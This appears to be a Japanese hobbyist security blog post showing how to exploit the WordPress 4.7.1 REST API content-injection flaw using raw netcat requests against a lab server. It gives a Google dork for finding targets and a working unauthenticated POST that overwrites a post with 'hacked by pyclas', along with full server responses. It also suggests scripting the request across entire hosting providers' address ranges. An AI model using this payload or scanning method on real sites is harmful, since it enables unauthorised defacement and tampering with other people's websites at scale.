Pyclas on Security

pyclas@xmpp.cm (OTR)

すごーい!あなたはWordpress Rest API Exploitationが得意なフレンズなんだね!

f:id:pyclas:20170213015016j:plain

流行ってるのでやってみた。 ExploitDBで拾ってきたPythonぶん回すのでもできるけど、netcatでやりたかったのでNetcatでやった。

本気でやるならシェルスクリプトとかで適当にnetcatをラップしてGMOVPSとかさくらインターネットが持ってるアドレス帯に片っ端から確認方法に記載されたリクエストを投げればいい。

検証バージョン

Aapache Version

MySQL Version

  • Server version 5.7.17-0ubuntu0.16.04.1

PHP

Wordpress

  • $wp_version = ‘4.7.1’;

Dork

inurl:index.php/wp-json/wp/v2

確認方法

root@kali:~# netcat -nvv 192.168.12.63 80
(UNKNOWN) [192.168.12.63] 80 (http) open
GET /wordpress/index.php/wp-json/wp/v2/posts HTTP/1.1
Accept-Encoding: identity
Host: 192.168.12.63
Connection: close
User-Agent: Python-urllib/2.7

HTTP/1.1 200 OK
Date: Sun, 12 Feb 2017 14:44:43 GMT
Server: Apache/2.4.18 (Ubuntu)
X-Robots-Tag: noindex
Link: <http://192.168.12.63/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Access-Control-Allow-Headers: Authorization, Content-Type
X-WP-Total: 3
X-WP-TotalPages: 1
Allow: GET
Content-Length: 5138
Connection: close
Content-Type: application/json; charset=UTF-8

[{"id":7,"date":"2017-02-12T23:10:34","date_gmt":"2017-02-12T14:10:34","guid":{"rendered":"http:\/\/192.168.12.63\/wordpress\/?p=7"},"modified":"2017-02-12T23:10:34","modified_gmt":"2017-02-12T14:10:34","slug":"1","type":"post","link":"http:\/\/192.168.12.63\/wordpress\/index.php\/2017\/02\/12\/1\/","title":{"rendered":"test"},"content":{"rendered":"<p>test<\/p>\n","protected":false},"excerpt":{"rendered":"<p>test<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/7"}],"collection":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/comments?post=7"}],"version-history":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/7\/revisions"}],"wp:attachment":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/media?parent=7"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/categories?post=7"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/tags?post=7"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}},{"id":4,"date":"2017-02-10T16:25:11","date_gmt":"2017-02-10T07:25:11","guid":{"rendered":"http:\/\/192.168.12.63\/wordpress\/?p=4"},"modified":"2017-02-10T16:25:11","modified_gmt":"2017-02-10T07:25:11","slug":"aaaa","type":"post","link":"http:\/\/192.168.12.63\/wordpress\/index.php\/2017\/02\/10\/aaaa\/","title":{"rendered":"aaaa"},"content":{"rendered":"<p>aaaa<\/p>\n","protected":false},"excerpt":{"rendered":"<p>aaaa<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/4"}],"collection":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/comments?post=4"}],"version-history":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/4\/revisions"}],"wp:attachment":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/media?parent=4"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/categories?post=4"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/tags?post=4"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}},{"id":1,"date":"2017-02-10T16:22:49","date_gmt":"2017-02-10T07:22:49","guid":{"rendered":"http:\/\/192.168.12.63\/wordpress\/?p=1"},"modified":"2017-02-12T23:45:59","modified_gmt":"2017-02-12T14:45:59","slug":"hello-world","type":"post","link":"http:\/\/192.168.12.63\/wordpress\/index.php\/2017\/02\/10\/hello-world\/","title":{"rendered":"Hello world!"},"content":{"rendered":"<p>test<\/p>\n","protected":false},"excerpt":{"rendered":"<p>test<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/1"}],"collection":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/comments?post=1"}],"version-history":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/1\/revisions"}],"wp:attachment":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/media?parent=1"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/categories?post=1"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/tags?post=1"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}] sent 149, rcvd 5621
root@kali:~# 

攻撃

POST /wordpress/index.php/wp-json/wp/v2/posts/1/?id=1abc HTTP/1.1
Accept-Encoding: identity
Content-Length: 33
Host: 192.168.12.63
Content-Type: application/json
Connection: close
User-Agent: Python-urllib/2.7

{"content": "hacked by pyclas\n"}HTTP/1.1 200 OK
Date: Sun, 12 Feb 2017 14:16:45 GMT
Server: Apache/2.4.18 (Ubuntu)
X-Robots-Tag: noindex
Link: <http://192.168.12.63/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Access-Control-Allow-Headers: Authorization, Content-Type
Allow: POST, PUT, PATCH, DELETE
Content-Length: 1890
Connection: close
Content-Type: application/json; charset=UTF-8

{"id":1,"date":"2017-02-10T16:22:49","date_gmt":"2017-02-10T07:22:49","guid":{"rendered":"http:\/\/192.168.12.63\/wordpress\/?p=1","raw":"http:\/\/192.168.12.63\/wordpress\/?p=1"},"modified":"2017-02-12T23:16:45","modified_gmt":"2017-02-12T14:16:45","password":"","slug":"hello-world","status":"publish","type":"post","link":"http:\/\/192.168.12.63\/wordpress\/index.php\/2017\/02\/10\/hello-world\/","title":{"raw":"Hello world!","rendered":"Hello world!"},"content":{"raw":"hacked by pyclas\n","rendered":"<p>hacked by pyclas<\/p>\n","protected":false},"excerpt":{"raw":"","rendered":"<p>hacked by pyclas<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/1"}],"collection":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/comments?post=1"}],"version-history":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/1\/revisions"}],"wp:attachment":[{"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/media?parent=1"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/categories?post=1"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/192.168.12.63\/wordpress\/index.php\/wp-json\/wp\/v2\/tags?post=1"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

結果

f:id:pyclas:20170213014046p:plain